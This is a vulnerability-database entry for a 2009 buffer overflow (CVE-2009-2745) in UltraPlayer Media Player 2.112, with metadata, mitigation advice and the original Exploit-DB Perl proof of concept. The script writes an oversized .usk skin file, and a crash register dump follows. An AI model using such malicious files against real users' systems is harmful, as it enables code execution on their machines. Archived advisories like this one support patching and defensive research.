UltraPlayer Media Player 2.112

vendor:

UltraPlayer Media Player

by:

SarBoT511

9,3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: UltraPlayer Media Player

Affected Version From: 2.112

Affected Version To: 2.112

Patch Exists: YES

Related CWE: CVE-2009-2745

CPE: a:ultraplayer:ultraplayer_media_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

UltraPlayer Media Player 2.112

UltraPlayer Media Player 2.112 is vulnerable to a buffer overflow vulnerability due to improper bounds checking when handling specially crafted .usk files. By creating a .usk file with an overly long string, an attacker can overwrite the EIP register and execute arbitrary code. This vulnerability is identified by CVE-2009-2745.

Mitigation:

Upgrade to the latest version of UltraPlayer Media Player 2.112 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/perl

#UltraPlayer Media Player 2.112

#Coded by SarBoT511

#Download : http://download.cnet.com/UltraPlayer-Media-Player/3000-2139_4-10041974.html?tag=mncol

#GreatZ [ 2] : nEt^DeV!L [s4udi~cod3r] , dev1l fucker , The gobL!n , alM511 , BlacK_Zero , l!NUX_dROUx,HCJ.

#The Bug in thes place (C:\Program Files\UltraPlayer\Skins\Derailer.usk)

#EAX 00EDFBC0
#ECX 000002F4
#EDX 00000000
#EBX 41414141
#ESP 0012FB78
#EBP 0012FB80
#ESI 00EDEFF0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 00000000
#EIP 00471733 UPlayer.00471733


$str="A"x 5000;
$file="Derailer.usk";
open(my $FILE, ">>$file") or die "Error opening file.n";
print $FILE $str ;
close($FILE);
print "$file has been created.n";

# milw0rm.com [2009-08-05]